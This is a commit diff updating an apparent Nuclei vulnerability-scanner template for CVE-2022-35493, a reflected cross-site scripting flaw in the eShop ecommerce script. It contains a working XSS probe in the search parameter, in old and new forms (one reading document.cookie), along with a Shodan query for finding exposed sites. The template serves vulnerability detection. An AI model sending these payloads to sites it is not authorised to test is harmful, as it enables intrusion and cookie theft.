Update CVE-2022-35493.yaml

2022-08-10 00:48:12 +05:30 · 2022-08-10 00:48:12 +05:30 · 8d60af1b59
parent abae8d5788
commit 8d60af1b59
1 changed files with 13 additions and 9 deletions
--- a/cves/2022/CVE-2022-35493.yaml
+++ b/cves/2022/CVE-2022-35493.yaml
@ -8,24 +8,28 @@ info:
    eShop - Multipurpose Ecommerce Store Website v3.0.4 allows Reflected Cross-site scripting vulnerability in json search parse and the json response in wrteam.in.
  reference:
    - https://github.com/Keyvanhardani/Exploit-eShop-Multipurpose-Ecommerce-Store-Website-3.0.4-Cross-Site-Scripting-XSS/blob/main/README.md
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35493
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-35493
  metadata:
+    verified: true
    shodan-query: http.html:"eShop - Multipurpose Ecommerce"
-    verified: "true"
-  tags: xss,cve,2022
+  tags: cve,cve2022,eshop,xss

 requests:
  - method: GET
    path:
-      - '{{BaseURL}}/home/get_products?search=%22%3E%3CIMG%20SRC%3Dindex.php%20onerror%3Dalert(document.cookie)%3E'
+      - '{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'

    matchers-condition: and
    matchers:
+      - type: word
+        words:
+          - 'Search Result for \"><img src=x onerror=alert(document.domain)>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
      - type: status
        status:
          - 200
-
-      - type: word
-        words:
-          - '"><IMG SRC=index.php onerror=alert(document.cookie)>'
-        condition: and